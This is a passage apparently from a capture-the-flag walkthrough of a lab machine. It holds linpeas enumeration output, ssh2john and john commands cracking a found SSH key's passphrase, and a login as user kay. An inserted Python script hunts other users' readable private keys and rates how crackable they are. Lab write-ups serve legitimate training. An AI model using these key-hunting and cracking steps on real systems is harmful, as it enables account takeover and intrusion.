-rw-r--r-- 1 root root 1458 Apr 18 2018 /var/backups/apt.extended_states.1.gz
-rw-r--r-- 1 root root 764 Apr 17 2018 /var/backups/apt.extended_states.2.gz
[+] Interesting writable Files
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files
/dev/mqueue
/dev/mqueue/linpeas.txt
/dev/shm
/run/lock
/run/screen/S-jan
/run/user/1001
/run/user/1001/systemd
/sys/kernel/security/apparmor/.access
/sys/kernel/security/apparmor/.load
/sys/kernel/security/apparmor/.ns_level
/sys/kernel/security/apparmor/.ns_name
/sys/kernel/security/apparmor/.ns_stacked
/sys/kernel/security/apparmor/policy/.load
/sys/kernel/security/apparmor/policy/.remove
/sys/kernel/security/apparmor/policy/.replace
/sys/kernel/security/apparmor/.remove
/sys/kernel/security/apparmor/.replace
/sys/kernel/security/apparmor/.stacked
/tmp
/tmp/.font-unix
/tmp/.ICE-unix
/tmp/linpeas.sh
/tmp/.Test-unix
/tmp/tmux-1001
/tmp/.X11-unix
/tmp/.XIM-unix
/var/crash
/var/lib/lxcfs/cgroup/memory/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/init.scope/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/accounts-daemon.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/acpid.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/apache2.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/apparmor.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/apport.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/atd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/console-setup.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/cron.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/dbus.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/dev-disk-by\x2duuid-db3bdca8\x2d5517\x2d4600\x2db896\x2de8479e05e44a.swap/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/dev-hugepages.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/dev-mqueue.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/dev-xvda5.swap/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/grub-common.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/ifup@eth0.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/irqbalance.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/iscsid.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/keyboard-setup.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/kmod-static-nodes.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/lvm2-lvmetad.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/lvm2-monitor.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/lxcfs.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/lxd-containers.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/mdadm.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/-.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/networking.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/nmbd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/ondemand.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/open-iscsi.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/polkitd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/proc-sys-fs-binfmt_misc.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/rc-local.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/resolvconf.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/rsyslog.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/run-user-1001.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/samba-ad-dc.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/setvtrgb.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/smbd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/snapd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/ssh.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/sys-fs-fuse-connections.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/sys-kernel-debug.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-journald.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-journal-flush.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-logind.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-modules-load.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-random-seed.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-remount-fs.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-sysctl.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-timesyncd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-tmpfiles-setup-dev.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-tmpfiles-setup.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-udevd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-udev-trigger.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-update-utmp.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-user-sessions.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/system-getty.slice/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/system-serial\x2dgetty.slice/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/tomcat.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/ufw.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/unattended-upgrades.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/var-lib-lxcfs.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/user.slice/cgroup.event_control
/var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1001.slice/user@1001.service
/var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1001.slice/user@1001.service/cgroup.procs
/var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1001.slice/user@1001.service/init.scope
/var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1001.slice/user@1001.service/init.scope/cgroup.clone_children
/var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1001.slice/user@1001.service/init.scope/cgroup.procs
/var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1001.slice/user@1001.service/init.scope/notify_on_release
/var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1001.slice/user@1001.service/init.scope/tasks
/var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1001.slice/user@1001.service/tasks
/var/spool/samba
/var/tmp
/dev/mqueue/linpeas.txt
[+] Searching passwords in config PHP files
[+] Finding IPs inside logs (limit 100)
9 /var/log/dpkg.log:2.29.4.2
9 /var/log/dpkg.log:2.16.04.2
8 /var/log/dpkg.log:0.16.04.4
8 /var/log/apt/history.log:0.16.04.2
8 /var/log/apt/history.log:0.16.04.13
80 /var/log/dpkg.log:1.16.04.1
78 /var/log/dpkg.log:0.16.04.13
77 /var/log/dpkg.log:0.16.04.2
6 /var/log/apt/history.log:4.4.0.87
6 /var/log/apt/history.log:1.16.04.3
5 /var/log/apt/history.log:0.16.04.3
4 /var/log/wtmp:192.168.56.101
4 /var/log/installer/status:1.2.3.3
4 /var/log/installer/status:0.16.04.1
40 /var/log/dpkg.log:1.16.04.3
3 /var/log/apt/history.log:4.4.0.119
3 /var/log/apt/history.log:2.16.04.1
3 /var/log/apt/history.log:1.16.04.4
3 /var/log/apt/history.log:1.16.04.2
39 /var/log/dpkg.log:4.4.0.87
38 /var/log/dpkg.log:0.16.04.3
2 /var/log/wtmp:10.8.32.129
2 /var/log/bootstrap.log:0.99.7.1
2 /var/log/apt/history.log:3.16.04.1
2 /var/log/apt/history.log:0.96.20.7
25 /var/log/dpkg.log:1.16.04.2
24 /var/log/dpkg.log:1.16.04.4
21 /var/log/dpkg.log:4.4.0.119
21 /var/log/dpkg.log:2.16.04.1
20 /var/log/dpkg.log:3.16.04.1
1 /var/log/lastlog:192.168.56.102
1 /var/log/lastlog:10.8.32.129
1 /var/log/installer/status:2.21.63.3
1 /var/log/bootstrap.log:0.5.5.1
1 /var/log/apt/history.log:6.16.04.1
1 /var/log/apt/history.log:3.16.04.3
1 /var/log/apt/history.log:2.29.4.2
1 /var/log/apt/history.log:2.16.04.2
1 /var/log/apt/history.log:0.16.04.4
18 /var/log/apt/history.log:0.16.04.1
17 /var/log/dpkg.log:0.96.20.7
15 /var/log/dpkg.log:3.16.04.3
14 /var/log/wtmp:192.168.56.102
138 /var/log/dpkg.log:0.16.04.1
10 /var/log/dpkg.log:6.16.04.1
10 /var/log/apt/history.log:1.16.04.1
[+] Finding passwords inside logs (limit 100)
/var/log/bootstrap.log: base-passwd depends on libc6 (>= 2.8); however:
/var/log/bootstrap.log: base-passwd depends on libdebconfclient0 (>= 0.145); however:
/var/log/bootstrap.log:dpkg: base-passwd: dependency problems, but configuring anyway as you requested:
/var/log/bootstrap.log:Preparing to unpack .../base-passwd_3.5.39_amd64.deb ...
/var/log/bootstrap.log:Preparing to unpack .../passwd_1%3a4.2-3.1ubuntu5_amd64.deb ...
/var/log/bootstrap.log:Selecting previously unselected package base-passwd.
/var/log/bootstrap.log:Selecting previously unselected package passwd.
/var/log/bootstrap.log:Setting up base-passwd (3.5.39) ...
/var/log/bootstrap.log:Setting up passwd (1:4.2-3.1ubuntu5) ...
/var/log/bootstrap.log:Shadow passwords are now on.
/var/log/bootstrap.log:Unpacking base-passwd (3.5.39) ...
/var/log/bootstrap.log:Unpacking base-passwd (3.5.39) over (3.5.39) ...
/var/log/bootstrap.log:Unpacking passwd (1:4.2-3.1ubuntu5) ...
/var/log/dpkg.log:2017-08-01 11:16:21 configure base-passwd:amd64 3.5.39 3.5.39
/var/log/dpkg.log:2017-08-01 11:16:21 install base-passwd:amd64 <none> 3.5.39
/var/log/dpkg.log:2017-08-01 11:16:21 status half-configured base-passwd:amd64 3.5.39
/var/log/dpkg.log:2017-08-01 11:16:21 status half-installed base-passwd:amd64 3.5.39
/var/log/dpkg.log:2017-08-01 11:16:21 status installed base-passwd:amd64 3.5.39
/var/log/dpkg.log:2017-08-01 11:16:21 status unpacked base-passwd:amd64 3.5.39
/var/log/dpkg.log:2017-08-01 11:16:23 status half-configured base-passwd:amd64 3.5.39
/var/log/dpkg.log:2017-08-01 11:16:23 status half-installed base-passwd:amd64 3.5.39
/var/log/dpkg.log:2017-08-01 11:16:23 status unpacked base-passwd:amd64 3.5.39
/var/log/dpkg.log:2017-08-01 11:16:23 upgrade base-passwd:amd64 3.5.39 3.5.39
/var/log/dpkg.log:2017-08-01 11:16:28 install passwd:amd64 <none> 1:4.2-3.1ubuntu5
/var/log/dpkg.log:2017-08-01 11:16:28 status half-installed passwd:amd64 1:4.2-3.1ubuntu5
/var/log/dpkg.log:2017-08-01 11:16:28 status unpacked passwd:amd64 1:4.2-3.1ubuntu5
/var/log/dpkg.log:2017-08-01 11:16:31 configure base-passwd:amd64 3.5.39 <none>
/var/log/dpkg.log:2017-08-01 11:16:31 status half-configured base-passwd:amd64 3.5.39
/var/log/dpkg.log:2017-08-01 11:16:31 status installed base-passwd:amd64 3.5.39
/var/log/dpkg.log:2017-08-01 11:16:31 status unpacked base-passwd:amd64 3.5.39
/var/log/dpkg.log:2017-08-01 11:16:37 configure passwd:amd64 1:4.2-3.1ubuntu5 <none>
/var/log/dpkg.log:2017-08-01 11:16:37 status half-configured passwd:amd64 1:4.2-3.1ubuntu5
/var/log/dpkg.log:2017-08-01 11:16:37 status installed passwd:amd64 1:4.2-3.1ubuntu5
/var/log/dpkg.log:2017-08-01 11:16:37 status unpacked passwd:amd64 1:4.2-3.1ubuntu5
/var/log/dpkg.log:2017-08-01 11:17:35 status half-configured passwd:amd64 1:4.2-3.1ubuntu5
/var/log/dpkg.log:2017-08-01 11:17:35 status half-installed passwd:amd64 1:4.2-3.1ubuntu5
/var/log/dpkg.log:2017-08-01 11:17:35 status unpacked passwd:amd64 1:4.2-3.1ubuntu5
/var/log/dpkg.log:2017-08-01 11:17:35 status unpacked passwd:amd64 1:4.2-3.1ubuntu5.3
/var/log/dpkg.log:2017-08-01 11:17:35 upgrade passwd:amd64 1:4.2-3.1ubuntu5 1:4.2-3.1ubuntu5.3
/var/log/dpkg.log:2017-08-01 11:17:36 configure passwd:amd64 1:4.2-3.1ubuntu5.3 <none>
/var/log/dpkg.log:2017-08-01 11:17:36 status half-configured passwd:amd64 1:4.2-3.1ubuntu5.3
/var/log/dpkg.log:2017-08-01 11:17:36 status installed passwd:amd64 1:4.2-3.1ubuntu5.3
/var/log/dpkg.log:2017-08-01 11:17:36 status unpacked passwd:amd64 1:4.2-3.1ubuntu5.3
/var/log/installer/status:Description: Set up users and passwords
[+] Finding emails inside logs (limit 100)
4 /var/log/bootstrap.log:ftpmaster@ubuntu.com
17 /var/log/installer/status:kernel-team@lists.ubuntu.com
58 /var/log/installer/status:ubuntu-devel-discuss@lists.ubuntu.com
28 /var/log/installer/status:ubuntu-installer@lists.ubuntu.com
[+] Finding *password* or *credential* files in home
[+] Finding 'pwd' or 'passw' string inside /home, /var/www, /etc, /root and list possible web(/var/www) and config(/etc) passwords
/home/kay/.ssh/authorized_keys
/home/kay/.ssh/id_rsa
/home/kay/.ssh/id_rsa.pub
/var/www/html/development/j.txt
/etc/apache2/sites-available/default-ssl.conf: # file needs this password: `xxj31ZMTZzkVA'.
/etc/apache2/sites-available/default-ssl.conf: # Note that no password is obtained from the user. Every entry in the user
/etc/apparmor.d/abstractions/authentication: # databases containing passwords, PAM configuration files, PAM libraries
/etc/debconf.conf:Accept-Type: password
/etc/debconf.conf:Filename: /var/cache/debconf/passwords.dat
/etc/debconf.conf:Name: passwords
/etc/debconf.conf:Reject-Type: password
/etc/debconf.conf:Stack: config, passwords
/etc/samba/smb.conf.bak:; add user script = /usr/sbin/adduser --quiet --disabled-password --gecos "" %u
/etc/samba/smb.conf.bak: pam password change = yes
/etc/samba/smb.conf.bak: passwd chat = *Enter\snew\s*\spassword:* %n\n *Retype\snew\s*\spassword:* %n\n *password\supdated\ssuccessfully* .
/etc/samba/smb.conf.bak: unix password sync = yes
/etc/ssh/sshd_config:PermitEmptyPasswords no
/etc/ssh/sshd_config:PermitRootLogin prohibit-password
The private key /home/kay/.ssh/id_rsa is readable by jan, so we can use it to log in as kay. The key is passphrase-protected, though, so once copied to our machine as kay_rsa we convert it into a john-crackable hash with ssh2john and run a wordlist attack on the passphrase:
$ ssh2john kay_rsa > kay_rsa.hash
$ john kay_rsa.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
******* (kay_rsa)
1g 0:00:00:00 DONE (2023-04-30 15:29) 14.28g/s 1181Kp/s 1181Kc/s 1181KC/s behlat..bball40
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
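As an added example (not part of the original writeup), the Python below automates the triage that the linpeas "Private SSH keys found!" line and john's "Cost" line did by hand above: it walks a directory tree for readable private keys, parses each key's header and reports whether the key is passphrase-protected and how costly a wordlist attack on that passphrase would be. A traditional PEM key like kay's id_rsa (DEK-Info header, one MD5 per guess) cracks quickly; an openssh-key-v1 key with a bcrypt KDF costs thousands of bcrypt rounds per guess. The sample key files, the fake home-directory layout and the file names are constructed for the demo and contain no real key material.

```python
"""Triage readable SSH private keys: encrypted or not, and how hard to crack.
Added example, not from the original writeup; sample keys are constructed."""
import base64
import os
import re
import struct
import tempfile

# PEM armour: "RSA"/"DSA"/"EC" (traditional OpenSSL), "OPENSSH" (openssh-key-v1),
# "ENCRYPTED" or no label (PKCS#8). The label group is optional for that last case.
PEM_RE = re.compile(rb"-----BEGIN (?:([A-Z0-9 ]+?) )?PRIVATE KEY-----(.*?)-----END", re.S)


def _read_string(blob: bytes, off: int):
    """Read one uint32-length-prefixed 'string' from an openssh-key-v1 blob."""
    (n,) = struct.unpack(">I", blob[off:off + 4])
    return blob[off + 4:off + 4 + n], off + 4 + n


def classify_private_key(data: bytes) -> dict:
    """Return format, encryption status and a cracking-cost hint for one key file."""
    m = PEM_RE.search(data)
    if not m:
        return {"format": "unknown", "encrypted": None}
    label = m.group(1).decode() if m.group(1) else None
    body = m.group(2)

    if label == "OPENSSH":  # cipher and KDF names sit in the clear at the start of the blob
        try:
            raw = base64.b64decode(b"".join(body.split()))
        except ValueError:
            return {"format": "openssh-key-v1", "encrypted": None, "error": "bad base64"}
        magic = b"openssh-key-v1\0"
        if not raw.startswith(magic):
            return {"format": "openssh-key-v1", "encrypted": None, "error": "bad magic"}
        cipher, off = _read_string(raw, len(magic))
        kdf, off = _read_string(raw, off)
        kdfopts, off = _read_string(raw, off)
        rounds = None
        if kdf == b"bcrypt":  # kdfoptions = string salt || uint32 rounds
            _salt, o = _read_string(kdfopts, 0)
            (rounds,) = struct.unpack(">I", kdfopts[o:o + 4])
        encrypted = cipher != b"none"
        cost = ("slow (bcrypt KDF, %s rounds per guess)" % rounds) if encrypted else "n/a"
        return {"format": "openssh-key-v1", "encrypted": encrypted, "cipher": cipher.decode(),
                "kdf": kdf.decode(), "rounds": rounds, "crack_cost": cost}

    if label in (None, "ENCRYPTED"):  # PKCS#8: passphrase KDF is PBKDF2 inside the DER
        enc = label == "ENCRYPTED"
        return {"format": "pkcs8", "encrypted": enc, "crack_cost": "moderate (PBKDF2)" if enc else "n/a"}

    # Traditional PEM: a DEK-Info header means the body is encrypted with a key derived
    # from the passphrase by OpenSSL's EVP_BytesToKey, i.e. a single MD5 per guess.
    headers = dict(re.findall(rb"^([A-Za-z-]+): (.*)$", body, re.M))
    dek = headers.get(b"DEK-Info")
    if dek is None:
        return {"format": "pem", "key_type": label, "encrypted": False, "crack_cost": "n/a"}
    cipher = dek.split(b",")[0].decode()
    family = "MD5/3DES" if cipher == "DES-EDE3-CBC" else "MD5/AES"
    return {"format": "pem", "key_type": label, "encrypted": True, "cipher": cipher,
            "crack_cost": "fast (%s, one MD5 per guess)" % family}


def find_readable_keys(root: str):
    """Classify every readable file under root whose first line is a key header.
    Files we cannot open are skipped: that is what correct permissions look like."""
    found = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    data = fh.read(65536)  # keys are small; cap reads anyway
            except OSError:
                continue
            if data.startswith(b"-----BEGIN") and b"PRIVATE KEY-----" in data.split(b"\n", 1)[0]:
                info = classify_private_key(data)
                info["owner_uid"] = os.stat(path).st_uid
                info["foreign"] = info["owner_uid"] != os.geteuid()  # another user's key we can read
                found.append((path, info))
    return found


def constructed_samples() -> dict:
    """Constructed key files: real-shaped armour and headers, dummy bodies."""
    def sstr(b: bytes) -> bytes:  # openssh 'string' encoding
        return struct.pack(">I", len(b)) + b
    kdfopts = sstr(b"\x00" * 16) + struct.pack(">I", 16)  # 16-byte salt, 16 rounds
    blob = (b"openssh-key-v1\0" + sstr(b"aes256-ctr") + sstr(b"bcrypt") + sstr(kdfopts)
            + struct.pack(">I", 1))
    return {
        "id_rsa": (b"-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\n"
                   b"DEK-Info: AES-128-CBC,00112233445566778899AABBCCDDEEFF\n\n"
                   b"AAAA\n-----END RSA PRIVATE KEY-----\n"),
        "id_rsa_nopass": b"-----BEGIN RSA PRIVATE KEY-----\nAAAA\n-----END RSA PRIVATE KEY-----\n",
        "id_ed25519": (b"-----BEGIN OPENSSH PRIVATE KEY-----\n" + base64.b64encode(blob)
                       + b"\n-----END OPENSSH PRIVATE KEY-----\n"),
    }


def demo() -> dict:
    """Lay the samples out as a fake home/kay/.ssh and triage them, keyed by file name."""
    with tempfile.TemporaryDirectory() as home:
        sshdir = os.path.join(home, "kay", ".ssh")
        os.makedirs(sshdir)
        for name, data in constructed_samples().items():
            with open(os.path.join(sshdir, name), "wb") as fh:
                fh.write(data)
        with open(os.path.join(home, "kay", ".bash_history"), "wb") as fh:
            fh.write(b"ls -la\n")  # a non-key file that must be ignored
        return {os.path.basename(p): info for p, info in find_readable_keys(home)}


if __name__ == "__main__":
    for name, info in demo().items():
        print(name, info)
```

Run it against a real home tree (for example `find_readable_keys("/home")` as the low-privileged user) and every `foreign` key it lists is a candidate for ssh2john; the `crack_cost` field tells you before you start whether a rockyou run is realistic.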
# Question 9 - What is the name of the other user you found(all lower case)?
The answer is kay.
# Question 10 - If you have found another user, what can you do with this information?
No answer needed.
# Question 11 - What is the final password you obtain?
$ ssh kay@10.10.131.121 -i kay_rsa
Enter passphrase for key 'kay_rsa':
kay@basic2:~$ cat pass.bak
The passphrase ssh asks for is the one john recovered above (ssh will refuse the copied key if its file mode lets other users read it, so keep the key owner-only). The final password is inside the file pass.bak.